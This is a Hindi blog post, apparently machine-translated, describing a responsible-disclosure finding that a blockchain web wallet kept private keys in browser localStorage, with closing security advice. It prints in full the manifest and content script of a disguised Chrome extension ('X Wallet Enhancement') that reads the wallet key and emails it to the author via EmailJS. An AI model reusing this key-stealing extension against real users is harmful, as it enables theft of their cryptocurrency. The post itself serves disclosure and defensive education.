जनवरी 2022 में, मैं प्रूफ़-ऑफ़-स्टेक ब्लॉकचेन में से एक के समुदाय में शामिल हुआ। प्रोटोकॉल और उसके पारिस्थितिकी तंत्र की पेशकश के साथ खेलने के लिए, मैंने आधिकारिक वेबसाइट पर एक वॉलेट खाता बनाया। सामान्य जिज्ञासा के अलावा, मेरी दिलचस्पी इस बात में थी कि उन्होंने ब्राउज़र में सुरक्षा कैसे हासिल की, खासकर एक्सटेंशन और क्लाइंट-साइड कमजोरियों के युग में। https://wallet.****.org यह पता चला कि जब कोई उपयोगकर्ता लॉग इन करता है, तो वॉलेट एप्लिकेशन (रिएक्ट में निर्मित) सार्वजनिक और निजी कुंजी का एक सेट उत्पन्न करता है और उन्हें ब्राउज़र के स्थानीय भंडारण में संग्रहीत करता है। वितरित सिस्टम में प्रमाणीकरण और प्राधिकरण के निर्माण के अपने अनुभव के साथ, मुझे पता था कि ऐसा करना सबसे अच्छी बात नहीं है - सामान्य तौर पर, ब्राउज़र एक्सटेंशन और क्लाइंट-साइड कोड के लिए स्थानीय स्टोरेज से डेटा पढ़ना आसान है [ ]। 1 इसे साबित करने के लिए, मैंने का फैसला किया जो पीड़ित के ब्राउज़र से चाबियाँ पुनर्प्राप्त करेगा और उन्हें मेरे अज्ञात ईमेल पते पर भेज देगा। क्रोम के लिए एक सरल एक्सटेंशन लिखने मेरे पिकपॉकेट एक्सटेंशन की मूल निर्देशिका इस तरह दिखती थी: . ├── content.js ├── email.min.js ├── index.html └── manifest.json मुख्य फ़ाइलें और हैं। एक्सटेंशन स्थापित करने के लिए पूर्व आवश्यक है। manifest.json content.js { "name": "X Wallet Enhancement", "version": "1.0", "manifest_version": 3, "content_scripts": [ { "matches": [ "https://wallet.****.org/*" ], "js": [ "email.min.js", "content.js" ] } ] } क्लाउड सेवाओं में से एक क्लाइंट लाइब्रेरी है जो आपको बिना किसी सर्वर कोड के ब्राउज़र से सीधे ईमेल भेजने की अनुमति देती है। एक रिक्त HTML पृष्ठ है जो कुछ भी प्रदर्शित नहीं करता है। वॉलेट अपहरण का तर्क फ़ाइल में रहता था: email.min.js index.html content.js emailjs.init('user_****'); // instantiating an email delivery service let templateParams = { // gathering information about the victim's browser from_name: navigator.userAgent, // fetching wallet keys from the local storage storage: window.localStorage.getItem('_*:wallet:active_account_id_**'), }; // using a prepared email template to send an email with keys const serviceID = 'service_****'; const templateID = 'template_****'; emailjs.send(serviceID, templateID, templateParams) .then(() => { console.log("Wallet keys were send!"); }, (err) => { console.error(JSON.stringify(err)); }); हाँ, ऐसी ही एक डमी स्क्रिप्ट। मैंने सभी चार फाइलों को एक ज़िप संग्रह में पैक किया और अपने दोस्त से, जिसके पास पर एक वॉलेट भी था, मेरी रचना को अपने ब्राउज़र में इंस्टॉल करने के लिए कहा (कुछ सोशल इंजीनियरिंग करने का नाटक करते हुए)। ऐसा करने से पहले, मैंने उन्हें अपने निष्कर्षों और उस सिद्धांत के बारे में बताया जिसे मैं साबित करने की कोशिश कर रहा था। वह मदद करने में प्रसन्न था, और ब्राउज़र एक्सटेंशन इंस्टॉल होने के कुछ सेकंड बाद इस वॉलेट खाते की सार्वजनिक और निजी कुंजी मेरे इनबॉक्स में दिखाई दीं। इसके बाद, मैंने अपने ब्राउज़र में स्थानीय स्टोरेज की कुंजियाँ सहेजीं और वॉलेट वेबसाइट खोली। https://wallet.***.org आश्चर्य की बात यह है कि मेरे मित्र का क्रिप्टो-वॉलेट बैलेंस मेरे लिए उपलब्ध था, साथ ही धनराशि निकालने का विकल्प भी था। अपने पीड़ित मित्र के साथ ज़ूम कॉल के दौरान, मैंने उसके कुछ फंड एक गुमनाम खाते में स्थानांतरित कर दिए और वापस आ गए। यह मन को झकझोर देने वाला था! एक नया, आशाजनक ब्लॉकचेन जिसने हाल ही में एक निवेश दौर बंद कर दिया था, उसके बटुए में एक बड़ी भेद्यता थी। सबसे बुरी बात यह है कि उनके पास उपयोगकर्ताओं के लिए 2-कारक प्रमाणीकरण था। निःसंदेह, बहुत से लोग इसे तुरंत सक्रिय नहीं करेंगे, और बहुतों ने नहीं किया। एक नैतिक डेवलपर के रूप में, मैंने एक भेद्यता रिपोर्ट बनाई, जिसमें ब्राउज़र एक्सटेंशन का स्रोत कोड और वेब एप्लिकेशन की सुरक्षा में सुधार करने के तरीके पर मेरे विचार शामिल थे। इसे 18 जनवरी को सीधे सुरक्षा टीम के ईमेल पते पर भेजा गया था। कुछ दिनों बाद, मुझे ब्लॉकचेन प्रोटोकॉल के सीआईएसओ से फोन आया, जिन्होंने मुझे आश्वासन दिया कि वे इस मुद्दे से अवगत हैं और अगली रिलीज में इसका समाधान करेंगे। मैं घटना पर प्रतिक्रिया की गति से थोड़ा निराश था। जब कोई उपयोगकर्ताओं के पैसे के बारे में बात करता है तो दो दिन अनंत काल होते हैं। फिर भी, ब्लॉकचेन डेवलपर्स ने मुझे 1000 यूएसडीटी के बराबर राशि में अपने टोकन दिए। 👉🏻 आपके द्वारा उपयोग की जाने वाली तकनीकों और उनके सुरक्षा पहलुओं से अवगत रहें। एप्लिकेशन डेवलपर्स के लिए सलाह: 💡 जानें कि कोई संगठन आपको कौन से सुरक्षा विकल्प प्रदान करता है, वॉलेट खाता बनाते ही दो-कारक प्रमाणीकरण सक्रिय करें, अपने सभी फंड हॉट वॉलेट में संग्रहीत न करें। क्रिप्टो उपयोगकर्ताओं के लिए सलाह: पढंने योग्य क्या लोकलस्टोरेज का उपयोग सुरक्षित है? | Snyk कृपया स्थानीय संग्रहण का उपयोग बंद करें HTTP कुकीज़ का उपयोग करना - HTTP | एमडीएन केवल Http | ओडब्ल्यूएएसपी फाउंडेशन भी प्रकाशित किया गया है. यहाँ
